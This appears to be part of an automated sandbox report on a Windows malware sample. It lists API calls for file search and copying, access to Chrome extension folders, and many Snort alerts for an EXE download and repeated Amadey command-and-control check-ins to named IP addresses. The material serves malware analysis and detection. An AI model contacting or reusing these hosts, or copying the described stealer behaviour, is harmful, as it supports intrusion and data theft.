                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3[1].dll.0.dr
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: mozglue[1].dll.0.dr
                              Source: Binary string: C:\kinukuconuwukuwok24_motowubidanagosumozi_dibiciyixaho-pow.pdb source: wKYTg7Gp6P.exe, 00000000.00000003.684695927.0000000002CA4000.00000004.00000001.sdmp, M7WCJ84VE5TXJ0R4.exe, 00000005.00000000.695429336.0000000000415000.00000002.00020000.sdmp, blfte.exe, 0000000A.00000000.708934344.0000000000415000.00000002.00020000.sdmp, blfte.exe.5.dr
                              Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: wKYTg7Gp6P.exe, 00000000.00000003.666628269.0000000002F10000.00000004.00000001.sdmp, nss3.dll.0.dr
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3[1].dll.0.dr
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0040657E __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose,0_2_0040657E
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_00404905 __EH_prolog3,_memset,_memset,_memset,_memset,lstrcpyW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileW,FindClose,_memset,_memset,_memset,_memset,_memset,_memset,_memset,_memset,FindClose,0_2_00404905
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0045F3B6 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,0_2_0045F3B6
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_00405437 __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,0_2_00405437
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0040F7AE _sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,0_2_0040F7AE
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0040F998 __EH_prolog3,__wgetenv,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,0_2_0040F998
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_00419F82 FindFirstFileExW,5_2_00419F82
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_0211A1D2 FindFirstFileExW,5_2_0211A1D2
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_00419F82 FindFirstFileExW,10_2_00419F82
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_0223A1D2 FindFirstFileExW,10_2_0223A1D2
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_00406917 _strtok,_strtok,__wgetenv,__wgetenv,GetLogicalDriveStringsA,_strtok,GetDriveTypeA,_strtok,0_2_00406917
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\Jump to behavior

                              Networking:

                              barindex
                              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                              Source: TrafficSnort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.2.4:49744 -> 89.184.92.210:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49750 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49752 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49753 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49754 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49755 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49756 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49757 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49758 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49759 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49760 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49761 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49762 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49763 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49764 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49765 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49766 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49767 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49768 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49769 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49770 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49771 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49772 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49773 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49774 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49775 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49776 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49777 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49778 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49779 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49780 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49781 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49783 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 100000118 COMMUNITY WEB-CLIENT Internet Explorer URLMON.DLL Content-Type Overflow Attempt 176.111.174.114:80 -> 192.168.2.4:49782
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49784 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49785 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49787 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49789 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49790 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49791 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49793 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49794 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49795 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49796 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49797 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49798 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49799 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49800 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49801 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49802 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49803 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49804 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49805 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49806 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49807 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49808 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49809 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49810 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49811 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49812 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49813 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49814 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49815 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49816 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49817 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49818 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49819 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49820 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49821 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49822 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49823 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49826 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49827 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49830 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49831 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49833 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49835 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49838 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49839 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49841 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49842 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49844 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49846 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49848 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49850 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49851 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49853 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49855 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49856 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49857 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49859 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49861 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49863 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49864 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49866 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49867 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49868 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49870 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49871 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49872 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49873 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49874 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49876 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49877 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49879 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49880 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49881 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49882 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49884 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49885 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49886 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49887 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49888 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49890 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49891 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49893 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49894 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49895 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49896 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49901 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49904 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49905 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49906 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49908 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49910 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49911 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49912 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49913 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49915 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49916 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49917 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49918 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49920 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49921 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49922 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49924 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49925 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49926 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49928 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49929 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49930 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49931 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49932 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49934 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49935 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49937 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49938 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49939 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49940 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49942 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49943 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49944 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49945 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49947 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49948 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49950 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49951 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49952 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49953 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49955 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49956 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49957 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49958 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49960 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49961 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49963 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49964 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49965 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49966 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49968 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49969 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49970 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49971 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49973 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49974 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49976 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49977 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49979 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49980 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49981 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49982 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49983 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49985 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49986 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49988 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49989 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49990 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49992 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49993 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49994 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49995 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49997 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49998 -> 176.111.174.114:80
